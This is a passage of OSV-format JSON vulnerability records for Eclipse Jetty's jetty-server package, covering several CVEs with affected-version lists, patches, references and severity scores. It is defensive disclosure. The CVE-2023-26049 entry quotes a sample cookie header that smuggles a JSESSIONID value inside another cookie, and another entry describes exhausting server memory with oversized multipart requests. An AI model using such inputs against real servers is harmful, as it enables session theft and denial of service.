"7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.40", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.3" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.3" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-m6cp-vxjx-65j6/GHSA-m6cp-vxjx-65j6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34428" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210813-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4949" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-613" ], "github_reviewed": true, "github_reviewed_at": "2021-06-22T16:41:00Z", "nvd_published_at": "2021-06-22T15:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mwcx-532g-8pq3", "published": "2018-10-16T17:44:11Z", "modified": "2024-02-17T05:43:52.147542Z", "aliases": [ "CVE-2018-12538" ], "summary": "Access and integrity issue within Eclipse Jetty", "details": "In Eclipse Jetty versions 9.4.0 through 9.4.8, when using the optional Jetty provided FileSessionDataStore for persistent storage of HttpSession details, it is possible for a malicious user to access/hijack other HttpSessions and even delete unmatched HttpSessions present in the FileSystem's storage for the FileSessionDataStore.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-mwcx-532g-8pq3/GHSA-mwcx-532g-8pq3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12538" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=536018" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mwcx-532g-8pq3" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-384", "CWE-6" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:31Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p26g-97m4-6q7c", "published": "2023-04-18T22:19:57Z", "modified": "2024-02-20T05:30:22.058149Z", "aliases": [ "CVE-2023-26049" ], "related": [ "CGA-6jj8-gqq9-qj3c", "CVE-2023-26049" ], "summary": "Eclipse Jetty's cookie parsing of quoted values can exfiltrate values from other cookies", "details": "Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism.\n\nIf Jetty sees a cookie VALUE that starts with `\"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered.\n\nSo, a cookie header such as:\n\n`DISPLAY_LANGUAGE=\"b; JSESSIONID=1337; c=d\"` will be parsed as one cookie, with the name `DISPLAY_LANGUAGE` and a value of `b; JSESSIONID=1337; c=d`\n\ninstead of 3 separate cookies.\n\n### Impact\nThis has security implications because if, say, `JSESSIONID` is an `HttpOnly` cookie, and the `DISPLAY_LANGUAGE` cookie value is rendered on the page, an attacker can smuggle the `JSESSIONID` cookie into the `DISPLAY_LANGUAGE` cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server.\n\n### Patches\n* 9.4.51.v20230217 - via PR #9352\n* 10.0.15 - via PR #9339\n* 11.0.15 - via PR #9339\n\n### Workarounds\nNo workarounds\n\n### References\n* https://www.rfc-editor.org/rfc/rfc2965\n* https://www.rfc-editor.org/rfc/rfc6265\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.51.v20230217" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.14" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.14" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0alpha0" }, { "fixed": "12.0.0.beta0" } ] } ], "versions": [ "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p26g-97m4-6q7c/GHSA-p26g-97m4-6q7c.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-p26g-97m4-6q7c" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26049" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9339" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/9352" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.51.v20230217" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230526-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5507" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc2965" }, { "type": "WEB", "url": "https://www.rfc-editor.org/rfc/rfc6265" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-04-18T22:19:57Z", "nvd_published_at": "2023-04-18T21:15:09Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4rv-gq96-w7c5", "published": "2025-05-08T19:28:34Z", "modified": "2025-05-08T19:57:34.204933Z", "aliases": [ "CVE-2024-13009" ], "related": [ "CGA-45cx-7c8c-j882", "CGA-rwgq-jjw3-3vrc" ], "summary": "**UNSUPPORTED WHEN ASSIGNED** GzipHandler causes part of request body to be seen as request body of a separate request", "details": "In Eclipse Jetty versions 9.4.0 to 9.4.56 a buffer can be incorrectly released when confronted with a gzip error when inflating a request body. This can result in corrupted and/or inadvertent sharing of data between requests.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.57.v20241219" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.56.v20240826", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.56", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-q4rv-gq96-w7c5/GHSA-q4rv-gq96-w7c5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-q4rv-gq96-w7c5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13009" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/48" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-05-08T19:28:34Z", "nvd_published_at": "2025-05-08T18:15:41Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qw69-rqj8-6qw8", "published": "2023-04-19T18:15:45Z", "modified": "2024-02-20T05:33:41.250857Z", "aliases": [ "CVE-2023-26048" ], "related": [ "CGA-q672-cgj3-7q4g", "CVE-2023-26048" ], "summary": "OutOfMemoryError for large multipart without filename in Eclipse Jetty", "details": "### Impact\nServlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and a very large content.\n\nThis happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk.\n\nAn attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`.\nHowever, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time.\n\nA very large number of parts may cause the same problem.\n\n### Patches\nPatched in Jetty versions\n\n* 9.4.51.v20230217 - via PR #9345\n* 10.0.14 - via PR #9344\n* 11.0.14 - via PR #9344\n\n### Workarounds\nMultipart parameter `maxRequestSize` must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).\nLimiting multipart parameter `maxFileSize` won't be enough because an attacker can send a large number of parts that summed up will cause memory issues.\n\n### References\n* https://github.com/eclipse/jetty.project/issues/9076\n* https://github.com/jakartaee/servlet/blob/6.0.0/spec/src/main/asciidoc/servlet-spec-body.adoc#32-file-upload\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.51.v20230217" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", 